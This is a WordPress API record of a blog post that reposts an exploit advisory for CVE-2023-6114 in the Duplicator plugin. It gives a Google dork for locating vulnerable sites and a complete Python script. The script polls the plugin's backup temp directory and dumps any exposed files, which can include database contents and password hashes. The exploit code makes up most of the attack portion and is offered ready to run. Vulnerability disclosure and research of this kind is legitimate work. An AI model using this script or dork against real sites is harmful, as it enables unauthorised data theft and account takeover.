{"id":55289,"date":"2024-03-11T18:59:50","date_gmt":"2024-03-11T15:59:50","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177521\/wpduplicator-takeover.txt"},"modified":"2024-03-12T11:01:59","modified_gmt":"2024-03-12T07:31:59","slug":"wordpress-duplicator-data-exposure-account-takeover","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-duplicator-data-exposure-account-takeover\/","title":{"rendered":"WordPress Duplicator Data Exposure \/ Account Takeover"},"content":{"rendered":"<p># Exploit Title: WordPress Plugin Duplicator &lt; 1.5.7.1 &#8211;<br \/>\nUnauthenticated Sensitive Data Exposure to Account Takeover<br \/>\n# Google Dork: inurl:(&#8220;plugins\/duplicator\/&#8221;)<br \/>\n# Date: 2023-12-04<br \/>\n# Exploit Author: Dmitrii Ignatyev<br \/>\n# Vendor Homepage: https:\/\/duplicator.com\/<br \/>\n# Software Link: https:\/\/wordpress.org\/plugins\/duplicator\/<br \/>\n# Version: 1.5.7.1<br \/>\n# Tested on: WordPress 6.4<br \/>\n# CVE : CVE-2023-6114<br \/>\n# CVE-Link : https:\/\/wpscan.com\/vulnerability\/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1\/<br \/>\n# CVE-Link : https:\/\/research.cleantalk.org\/cve-2023-6114-duplicator-poc-exploit\/<\/p>\n<p>A severe vulnerability has been discovered in the directory<br \/>\n*\/wordpress\/wp-content\/backups-dup-lite\/tmp\/*. 
This flaw not only<br \/>\nexposes extensive information about the site, including its<br \/>\nconfiguration, directories, and files, but more critically, it<br \/>\nprovides unauthorized access to sensitive data within the database and<br \/>\nall data inside. Exploiting this vulnerability poses an imminent<br \/>\nthreat, leading to potential <em>brute force attacks on password hashes<br \/>\nand, subsequently, the compromise of the entire system<\/em>.<\/p>\n<p>POC:<\/p>\n<p>1) It is necessary that either the administrator runs a backup or the auto-backup runs<br \/>\nautomatically at the scheduled time<\/p>\n<p>2) The exploit sends file search requests every 5 seconds<\/p>\n<p>3) I attack the site with this vulnerability using an exploit<\/p>\n<p>The exploit sends a request to the server every 5 seconds to the path<br \/>\n\u201chttp:\/\/your_site\/wordpress\/wp-content\/backups-dup-lite\/tmp\/\u201d and if<br \/>\nthe directory index lists anything, it instantly parses all the data<br \/>\nand displays it on the screen<\/p>\n<p>Exploit (python3):<\/p>\n<pre><code>import re\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n# Directory whose autoindex listing is polled\nurl = \"http:\/\/127.0.0.1\/wordpress\/wp-content\/backups-dup-lite\/tmp\/\"\nprocessed_files = set()\n\n\ndef get_file_names(url):\n    # Fetch the directory index and collect the linked file names\n    response = requests.get(url)\n\n    if response.status_code == 200 and len(response.text) &gt; 0:\n        soup = BeautifulSoup(response.text, 'html.parser')\n        links = soup.find_all('a')\n\n        file_names = []\n        for link in links:\n            file_name = link.get('href')\n            # Skip the parent-directory link and the autoindex sort links\n            if file_name and file_name != \"..\/\" and not file_name.startswith(\"?\"):\n                file_names.append(file_name)\n\n        return file_names\n    return []\n\n\ndef get_file_content(url, file_name):\n    file_url = url + file_name\n\n    # Zip archives are skipped; only text files are fetched and shown\n    if re.search(r'\\.zip(?:\\.|$)', file_name, re.IGNORECASE):\n        print(f\"Ignoring file: {file_name}\")\n        return None\n\n    file_response = requests.get(file_url)\n\n    if file_response.status_code == 200:\n        return file_response.text\n    return None\n\n\nwhile True:\n    file_names = get_file_names(url)\n\n    if file_names:\n        print(\"File names on the page:\")\n        for file_name in file_names:\n            if file_name not in processed_files:\n                print(file_name)\n                file_content = get_file_content(url, file_name)\n\n                if file_content is not None:\n                    print(\"File content:\")\n                    print(file_content)\n                    processed_files.add(file_name)\n\n    time.sleep(5)\n<\/code><\/pre>\n<p>&#8212;<br \/>\nWith best regards,<br \/>\nDmitrii Ignatyev, Penetration Tester<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Plugin Duplicator &lt; 1.5.7.1 &#8211; Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:(&#8220;plugins\/duplicator\/&#8221;) # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https:\/\/duplicator.com\/ # Software Link: https:\/\/wordpress.org\/plugins\/duplicator\/ # Version: 1.5.7.1 # Tested on: WordPress 6.4 # CVE : CVE-2023-6114 # CVE-Link : https:\/\/wpscan.com\/vulnerability\/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1\/ # CVE-Link : 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55289","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55289"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289\/revisions"}],"predecessor-version":[{"id":55304,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55289\/revisions\/55304"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55289"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55289"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}